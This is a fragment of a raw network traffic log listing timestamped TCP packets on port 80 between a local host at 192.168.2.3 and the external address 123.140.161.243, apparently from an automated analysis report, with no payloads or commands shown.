Jun 21, 2023 04:27:50.647149086 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647166014 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647177935 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647202015 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647208929 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647226095 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647238970 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647264004 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647268057 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647298098 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647298098 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647316933 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647326946 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647350073 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647357941 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647384882 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647387981 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647403002 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647417068 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647433043 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647445917 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647461891 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647475004 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647494078 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647505045 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647536039 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647542953 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647562981 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647568941 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647598982 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647598028 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647629976 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647638083 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647659063 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647660017 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647690058 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647705078 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647721052 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647725105 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647743940 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647766113 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.657922029 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.657974005 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.657993078 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658013105 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658032894 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658051014 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658070087 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658088923 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658099890 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.658107042 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658126116 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658145905 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658152103 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.658152103 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.658166885 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658178091 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.658186913 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658206940 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658210039 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.658226013 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658231974 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.658246040 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.658250093 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.658282995 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.658319950 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.667000055 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703083038 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703145981 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703172922 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703203917 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703232050 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703259945 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703294039 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703320980 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703342915 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703346014 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703346014 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703370094 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703399897 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703408003 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703408003 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703429937 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703452110 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703480005 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703507900 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703512907 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703512907 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703536034 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703562975 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703589916 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703594923 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703619957 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703663111 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703692913 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703722954 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703743935 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703744888 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703749895 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703778982 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703799963 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703799963 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703809023 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703835964 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703869104 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703896999 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703901052 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703924894 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703953028 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.703973055 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703973055 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.703982115 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704010010 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704036951 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704065084 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704093933 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704093933 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704119921 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704121113 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704148054 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704160929 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704176903 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704199076 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704224110 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704242945 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704242945 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704250097 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704293013 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704298973 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704317093 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704344034 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704370022 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704396009 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704421997 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704428911 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704428911 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704447031 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704473972 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704500914 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704526901 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704552889 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704560995 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704560995 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704580069 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704582930 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704607010 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704637051 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704663038 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704670906 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704672098 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704694986 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704722881 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704746962 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704771042 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704793930 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704804897 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704804897 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704818964 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704845905 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704869032 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704891920 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704894066 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704894066 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.704915047 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704938889 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704962015 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.704987049 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705009937 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705013037 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.705013037 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.705033064 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705056906 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705080032 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705086946 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.705086946 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.705105066 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705127001 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705151081 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705174923 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705178022 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.705178022 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.705199957 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705224991 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705250025 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705257893 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.705275059 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705300093 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705322981 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.705322981 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.705326080 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705352068 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705375910 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705399990 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.705450058 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.705450058 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.724941969 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.724976063 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.725008965 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.725032091 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.725115061 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.725115061 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.748419046 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.748466015 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.748500109 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.748533010 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.748627901 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.752114058 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.752887011 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.752914906 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.752938986 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.752964020 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.753004074 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.753004074 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.768848896 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887073040 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887116909 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887140989 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887165070 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887187958 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887209892 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887233973 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887259960 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887285948 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887288094 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887289047 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887289047 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887289047 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887312889 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887341976 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887358904 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887358904 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887367010 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887387037 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887393951 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887418985 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887420893 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887435913 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887445927 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887470961 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887487888 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887495041 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887520075 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887542009 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887564898 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887592077 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887592077 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887619019 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887619019 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887636900 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887670994 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887675047 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887675047 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887696028 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887717009 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887722015 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887733936 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887747049 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887763977 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887773037 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887787104 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887797117 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887815952 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887824059 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887851000 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887878895 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887903929 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887914896 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887914896 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887914896 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887914896 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887929916 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887944937 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887957096 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.887969971 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.887981892 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888008118 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888031006 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888030052 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888046980 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888057947 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888082027 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888092041 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888107061 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888133049 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888140917 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888140917 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888140917 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888158083 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888183117 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888204098 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888207912 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888222933 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888235092 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888262033 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888271093 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888295889 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888319969 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888330936 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888344049 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888356924 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888356924 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888371944 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888396025 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888417006 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888422012 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888437033 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888447046 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888470888 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888475895 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888497114 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888514996 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888521910 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888540030 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888546944 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888573885 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888581038 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888600111 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888606071 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888632059 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888632059 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888639927 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888665915 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888689041 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888689995 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888710022 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888717890 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888732910 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888741970 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888761997 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888768911 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888794899 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888816118 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888820887 CEST	80	49714	123.140.161.243	192.168.2.3
